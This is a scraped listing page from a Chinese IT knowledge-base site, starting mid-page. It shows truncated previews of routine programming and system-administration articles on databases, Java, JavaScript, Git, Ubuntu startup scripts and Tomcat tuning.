<a class="tag" taget="_blank" href="/search/sqlite/1.htm">sqlite</a>
                                    <div>转载： 
http://www.cnblogs.com/ygm900/p/3460663.html 
 
mysql 和 sqlite 区别 
 
SQLITE是单机数据库。功能简约，小型化，追求最大磁盘效率 
MYSQL是完善的服务器数据库。功能全面，综合化，追求最大并发效率 
 
MYSQL、Sybase、Oracle等这些都是试用于服务器数据量大功能多需要安装，例如网站访问量比较大的。而sq</div>
                                </li>
                                <li><a href="/article/526.htm"
                                       title="pinyin4j使用" target="_blank">pinyin4j使用</a>
                                    <span class="text-muted">oloz</span>
<a class="tag" taget="_blank" href="/search/pinyin4j/1.htm">pinyin4j</a>
                                    <div>首先需要pinyin4j的jar包支持；jar包已上传至附件内 
 
方法一:把汉字转换为拼音；例如：编程转换后则为biancheng 
&nbsp;&nbsp;&nbsp;&nbsp; 
 
/**
     * 将汉字转换为全拼
     * @param src 你的需要转换的汉字
     * @param isUPPERCASE 是否转换为大写的拼音； true:转换为大写；fal</div>
                                </li>
                                <li><a href="/article/653.htm"
                                       title="微博发送私信" target="_blank">微博发送私信</a>
                                    <span class="text-muted">随意而生</span>
<a class="tag" taget="_blank" href="/search/%E5%BE%AE%E5%8D%9A/1.htm">微博</a>
                                    <div>在前面文章中说了如和获取登陆时候所需要的cookie，现在只要拿到最后登陆所需要的cookie，然后抓包分析一下微博私信发送界面 
http://weibo.com/message/history?uid=****&amp;name=**** 
可以发现其发送提交的Post请求和其中的数据， 
让后用程序模拟发送POST请求中的数据，带着cookie发送到私信的接入口，就可以实现发私信的功能了。 </div>
                                </li>
                                <li><a href="/article/780.htm"
                                       title="jsp" target="_blank">jsp</a>
                                    <span class="text-muted">香水浓</span>
<a class="tag" taget="_blank" href="/search/jsp/1.htm">jsp</a>
                                    <div>JSP初始化 
&nbsp;&nbsp;&nbsp; 容器载入JSP文件后，它会在为请求提供任何服务前调用jspInit()方法。如果您需要执行自定义的JSP初始化任务，复写jspInit()方法就行了 
 
 
JSP执行 
&nbsp;&nbsp;&nbsp; 这一阶段描述了JSP生命周期中一切与请求相关的交互行为，直到被销毁。 
&nbsp;&nbsp;&nbsp; 当JSP网页完成初始化后</div>
                                </li>
                                <li><a href="/article/907.htm"
                                       title="在 Windows 上安装 SVN Subversion 服务端" target="_blank">在 Windows 上安装 SVN Subversion 服务端</a>
                                    <span class="text-muted">AdyZhang</span>
<a class="tag" taget="_blank" href="/search/SVN/1.htm">SVN</a>
                                    <div>在 Windows 上安装 SVN Subversion 服务端2009-09-16高宏伟哈尔滨市道里区通达街291号 
&nbsp; 
最佳阅读效果请访问原地址：http://blog.donews.com/dukejoe/archive/2009/09/16/1560917.aspx 
&nbsp; 
现在的Subversion已经足够稳定，而且已经进入了它的黄金时段。我们看到大量的项目都在使</div>
                                </li>
                                <li><a href="/article/1034.htm"
                                       title="android开发中如何使用 alertDialog从listView中删除数据？" target="_blank">android开发中如何使用 alertDialog从listView中删除数据？</a>
                                    <span class="text-muted">aijuans</span>
<a class="tag" taget="_blank" href="/search/android/1.htm">android</a>
                                    <div>我现在使用listView展示了很多的配置信息，我现在想在点击其中一条的时候填出 alertDialog,点击确认后就删除该条数据，（ ArrayAdapter&nbsp;，ArrayList，listView 全部删除），我知道在 下面的onItemLongClick&nbsp;方法中 参数 arg2&nbsp; 是选中的序号，但是我不知道如何继续处理下去        1   2   3   </div>
                                </li>
                                <li><a href="/article/1161.htm"
                                       title="jdk-6u26-linux-x64.bin 安装" target="_blank">jdk-6u26-linux-x64.bin 安装</a>
                                    <span class="text-muted">baalwolf</span>
<a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a>
                                    <div>1.上传安装文件(jdk-6u26-linux-x64.bin) 
2.修改权限 
[root@localhost ~]# ls -l /usr/local/jdk-6u26-linux-x64.bin 
3.执行安装文件 
[root@localhost ~]# cd /usr/local 
[root@localhost local]# ./jdk-6u26-linux-x64.bin&nbs</div>
                                </li>
                                <li><a href="/article/1288.htm"
                                       title="MongoDB经典面试题集锦" target="_blank">MongoDB经典面试题集锦</a>
                                    <span class="text-muted">BigBird2012</span>
<a class="tag" taget="_blank" href="/search/mongodb/1.htm">mongodb</a>
                                    <div>1.什么是NoSQL数据库？NoSQL和RDBMS有什么区别？在哪些情况下使用和不使用NoSQL数据库？ 
NoSQL是非关系型数据库，NoSQL = Not Only SQL。 
关系型数据库采用的结构化的数据，NoSQL采用的是键值对的方式存储数据。 
在处理非结构化/半结构化的大数据时；在水平方向上进行扩展时；随时应对动态增加的数据项时可以优先考虑使用NoSQL数据库。 
在考虑数据库的成熟</div>
                                </li>
                                <li><a href="/article/1415.htm"
                                       title="JavaScript异步编程Promise模式的6个特性" target="_blank">JavaScript异步编程Promise模式的6个特性</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/Promise/1.htm">Promise</a>
                                    <div>&nbsp; &nbsp; &nbsp; &nbsp; Promise是一个非常有价值的构造器，能够帮助你避免使用镶套匿名方法，而使用更具有可读性的方式组装异步代码。这里我们将介绍6个最简单的特性。 
&nbsp; &nbsp; &nbsp; &nbsp; 在我们开始正式介绍之前，我们想看看Javascript Promise的样子： 
var p = new Promise(function(r</div>
                                </li>
                                <li><a href="/article/1542.htm"
                                       title="[Zookeeper学习笔记之八]Zookeeper源代码分析之Zookeeper.ZKWatchManager" target="_blank">[Zookeeper学习笔记之八]Zookeeper源代码分析之Zookeeper.ZKWatchManager</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/zookeeper/1.htm">zookeeper</a>
                                    <div>ClientWatchManager接口 
//接口的唯一方法materialize用于确定那些Watcher需要被通知
//确定Watcher需要三方面的因素1.事件状态 2.事件类型 3.znode的path
public interface ClientWatchManager {
    /**
     * Return a set of watchers that should</div>
                                </li>
                                <li><a href="/article/1669.htm"
                                       title="【Scala十五】Scala核心九：隐式转换之二" target="_blank">【Scala十五】Scala核心九：隐式转换之二</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/scala/1.htm">scala</a>
                                    <div>隐式转换存在的必要性， 
&nbsp; 
在Java Swing中，按钮点击事件的处理，转换为Scala的的写法如下： 
&nbsp; 
val button = new JButton
button.addActionListener(
    new ActionListener {
        def actionPerformed(event: ActionEvent) {
 </div>
                                </li>
                                <li><a href="/article/1796.htm"
                                       title="Android JSON数据的解析与封装小Demo" target="_blank">Android JSON数据的解析与封装小Demo</a>
                                    <span class="text-muted">ronin47</span>

                                    <div>转自：http://www.open-open.com/lib/view/open1420529336406.html 
package com.example.jsondemo; 
import org.json.JSONArray; 
import org.json.JSONException; 
import org.json.JSONObject; 
&nbsp;&nbsp; 
impor</div>
                                </li>
                                <li><a href="/article/1923.htm"
                                       title="[设计]字体创意设计方法谈" target="_blank">[设计]字体创意设计方法谈</a>
                                    <span class="text-muted">brotherlamp</span>
<a class="tag" taget="_blank" href="/search/UI/1.htm">UI</a><a class="tag" taget="_blank" href="/search/ui%E8%87%AA%E5%AD%A6/1.htm">ui自学</a><a class="tag" taget="_blank" href="/search/ui%E8%A7%86%E9%A2%91/1.htm">ui视频</a><a class="tag" taget="_blank" href="/search/ui%E6%95%99%E7%A8%8B/1.htm">ui教程</a><a class="tag" taget="_blank" href="/search/ui%E8%B5%84%E6%96%99/1.htm">ui资料</a>
                                    <div>&nbsp; 
从古至今，文字在我们的生活中是必不可少的事物，我们不能想象没有文字的世界将会是怎样。在平面设计中，UI设计师在文字上所花的心思和功夫最多，因为文字能直观地表达UI设计师所的意念。在文字上的创造设计，直接反映出平面作品的主题。 
如设计一幅戴尔笔记本电脑的广告海报，假设海报上没有出现“戴尔”两个文字，即使放上所有戴尔笔记本电脑的图片都不能让人们得知这些电脑是什么品牌。只要写上“戴尔笔</div>
                                </li>
                                <li><a href="/article/2050.htm"
                                       title="单调队列-用一个长度为k的窗在整数数列上移动，求窗里面所包含的数的最大值" target="_blank">单调队列-用一个长度为k的窗在整数数列上移动，求窗里面所包含的数的最大值</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95%E9%A2%98/1.htm">面试题</a>
                                    <div>import java.util.LinkedList;

/*

单调队列 滑动窗口
单调队列是这样的一个队列：队列里面的元素是有序的，是递增或者递减

题目：给定一个长度为N的整数数列a(i),i=0,1,...,N-1和窗长度k.

要求：f(i) = max{a(i-k+1),a(i-k+2),..., a(i)},i = 0,1,...,N-1

问题的另一种描述就</div>
                                </li>
                                <li><a href="/article/2177.htm"
                                       title="struts2处理一个form多个submit" target="_blank">struts2处理一个form多个submit</a>
                                    <span class="text-muted">chiangfai</span>
<a class="tag" taget="_blank" href="/search/struts2/1.htm">struts2</a>
                                    <div>web应用中，为完成不同工作，一个jsp的form标签可能有多个submit。如下代码： 
&lt;s:form action=&quot;submit&quot; method=&quot;post&quot; namespace=&quot;/my&quot;&gt;
&lt;s:textfield name=&quot;msg&quot; label=&quot;叙述：&quot;&gt;</div>
                                </li>
                                <li><a href="/article/2304.htm"
                                       title="shell查找上个月，陷阱及野路子" target="_blank">shell查找上个月，陷阱及野路子</a>
                                    <span class="text-muted">chenchao051</span>
<a class="tag" taget="_blank" href="/search/shell/1.htm">shell</a>
                                    <div>date -d &quot;-1 month&quot; +%F 
&nbsp;&nbsp;&nbsp; 以上这段代码，假如在2012/10/31执行，结果并不会出现你预计的9月份，而是会出现八月份，原因是10月份有31天，9月份30天，所以-1 month在10月份看来要减去31天，所以直接到了8月31日这天，这不靠谱。 
&nbsp;&nbsp;&nbsp; 野路子解决：假设当天日期大于15号</div>
                                </li>
                                <li><a href="/article/2431.htm"
                                       title="mysql导出数据中文乱码问题" target="_blank">mysql导出数据中文乱码问题</a>
                                    <span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/%E4%B8%AD%E6%96%87%E4%B9%B1%E7%A0%81/1.htm">中文乱码</a><a class="tag" taget="_blank" href="/search/%E5%AF%BC%E6%95%B0%E6%8D%AE/1.htm">导数据</a>
                                    <div>解决mysql导入导出数据乱码问题方法： 
 
１、进入mysql，通过如下命令查看数据库编码方式： 
 
mysql&gt;&nbsp; show variables like 'character_set_%'; 
+--------------------------+----------------------------------------+ 
| Variable_name&nbs</div>
                                </li>
                                <li><a href="/article/2558.htm"
                                       title="SAE部署Smarty出现：Uncaught exception 'SmartyException' with message 'unable to write" target="_blank">SAE部署Smarty出现：Uncaught exception 'SmartyException' with message 'unable to write</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a><a class="tag" taget="_blank" href="/search/smarty/1.htm">smarty</a><a class="tag" taget="_blank" href="/search/sae/1.htm">sae</a>
                                    <div>&nbsp; 
对于SAE出现的问题：Uncaught exception 'SmartyException' with message 'unable to write file...。 
官方给出了详细的FAQ：http://sae.sina.com.cn/?m=faqs&amp;catId=11#show_213 
解决方案为： 
&nbsp;       
01  
$path&nbsp;</div>
                                </li>
                                <li><a href="/article/2685.htm"
                                       title="《教父》系列台词" target="_blank">《教父》系列台词</a>
                                    <span class="text-muted">dcj3sjt126com</span>

                                    <div>Your love is also your weak point. 
你的所爱同时也是你的弱点。 
&nbsp; 
If anything in this life is certain, if history has taught us anything, it is 
that you can kill anyone. 
&nbsp; 
不顾家的人永远不可能成为一个真正的男人。&nbsp;&</div>
                                </li>
                                <li><a href="/article/2812.htm"
                                       title="mongodb安装与使用" target="_blank">mongodb安装与使用</a>
                                    <span class="text-muted">dyy_gusi</span>
<a class="tag" taget="_blank" href="/search/mongo/1.htm">mongo</a>
                                    <div>一.MongoDB安装和启动,widndows和linux基本相同 
1.下载数据库, 
&nbsp;&nbsp;&nbsp;&nbsp;linux:mongodb-linux-x86_64-ubuntu1404-3.0.3.tgz 
2.解压文件,并且放置到合适的位置 
&nbsp;&nbsp;&nbsp;&nbsp;tar -vxf&nbsp;mongodb-linux-x86_64-ubun</div>
                                </li>
                                <li><a href="/article/2939.htm"
                                       title="Git排除目录" target="_blank">Git排除目录</a>
                                    <span class="text-muted">geeksun</span>
<a class="tag" taget="_blank" href="/search/git/1.htm">git</a>
                                    <div>在Git的版本控制中，可能有些文件是不需要加入控制的，那我们在提交代码时就需要忽略这些文件，下面讲讲应该怎么给Git配置一些忽略规则。 
&nbsp; 
有三种方法可以忽略掉这些文件，这三种方法都能达到目的，只不过适用情景不一样。 
1. &nbsp;针对单一工程排除文件 
这种方式会让这个工程的所有修改者在克隆代码的同时，也能克隆到过滤规则，而不用自己再写一份，这就能保证所有修改者应用的都是同一</div>
                                </li>
                                <li><a href="/article/3066.htm"
                                       title="Ubuntu 创建开机自启动脚本的方法" target="_blank">Ubuntu 创建开机自启动脚本的方法</a>
                                    <span class="text-muted">hongtoushizi</span>
<a class="tag" taget="_blank" href="/search/ubuntu/1.htm">ubuntu</a>
                                    <div>转载自：&nbsp;http://rongjih.blog.163.com/blog/static/33574461201111504843245/ 
Ubuntu 创建开机自启动脚本的步骤如下：  
1) 将你的启动脚本复制到&nbsp;/etc/init.d目录下   以下假设你的脚本文件名为 test。   &nbsp;   
2) 设置脚本文件的权限    $ sudo chmod 755</div>
                                </li>
                                <li><a href="/article/3193.htm"
                                       title="第八章 流量复制/AB测试/协程" target="_blank">第八章 流量复制/AB测试/协程</a>
                                    <span class="text-muted">jinnianshilongnian</span>
<a class="tag" taget="_blank" href="/search/nginx/1.htm">nginx</a><a class="tag" taget="_blank" href="/search/lua/1.htm">lua</a><a class="tag" taget="_blank" href="/search/coroutine/1.htm">coroutine</a>
                                    <div>流量复制 
在实际开发中经常涉及到项目的升级，而该升级不能简单的上线就完事了，需要验证该升级是否兼容老的上线，因此可能需要并行运行两个项目一段时间进行数据比对和校验，待没问题后再进行上线。这其实就需要进行流量复制，把流量复制到其他服务器上，一种方式是使用如tcpcopy引流；另外我们还可以使用nginx的HttpLuaModule模块中的ngx.location.capture_multi进行并发</div>
                                </li>
                                <li><a href="/article/3320.htm"
                                       title="电商系统商品表设计" target="_blank">电商系统商品表设计</a>
                                    <span class="text-muted">lkl</span>

                                    <div>DROP TABLE IF EXISTS `category`; -- 类目表
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `category` (
  `id` int(11) NOT NUL</div>
                                </li>
                                <li><a href="/article/3447.htm"
                                       title="修改phpMyAdmin导入SQL文件的大小限制" target="_blank">修改phpMyAdmin导入SQL文件的大小限制</a>
                                    <span class="text-muted">pda158</span>
<a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a>
                                    <div>　用phpMyAdmin导入mysql数据库时，我的10M的 
数据库不能导入，提示mysql数据库最大只能导入2M。   　　 
phpMyAdmin数据库导入出错：   　　You probably tried to upload too large file. Please refer to documentation for ways to workaround this limit.  </div>
                                </li>
                                <li><a href="/article/3574.htm"
                                       title="Tomcat性能调优方案" target="_blank">Tomcat性能调优方案</a>
                                    <span class="text-muted">Sobfist</span>
<a class="tag" taget="_blank" href="/search/apache/1.htm">apache</a><a class="tag" taget="_blank" href="/search/jvm/1.htm">jvm</a><a class="tag" taget="_blank" href="/search/tomcat/1.htm">tomcat</a><a class="tag" taget="_blank" href="/search/%E5%BA%94%E7%94%A8%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">应用服务器</a>
                                    <div>一、操作系统调优 
 对于操作系统优化来说，是尽可能的增大可使用的内存容量、提高CPU的频率，保证文件系统的读写速率等。经过压力测试验证，在并发连接很多的情况下，CPU的处理能力越强，系统运行速度越快。。 
 【适用场景】 任何项目。 
 二、Java虚拟机调优 
 应该选择SUN的JVM，在满足项目需要的前提下，尽量选用版本较高的JVM，一般来说高版本产品在速度和效率上比低版本会有改进。 
 J</div>
                                </li>
                                <li><a href="/article/3701.htm"
                                       title="SQLServer学习笔记" target="_blank">SQLServer学习笔记</a>
                                    <span class="text-muted">vipbooks</span>
<a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/1.htm">数据结构</a><a class="tag" taget="_blank" href="/search/xml/1.htm">xml</a>
                                    <div>1、create database school 创建数据库school 
 
2、drop database school 删除数据库school 
 
3、use school 连接到school数据库，使其成为当前数据库 
 
4、create table class(classID int primary key identity not null) 
 创建一个名为class的表，其有一</div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类：</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>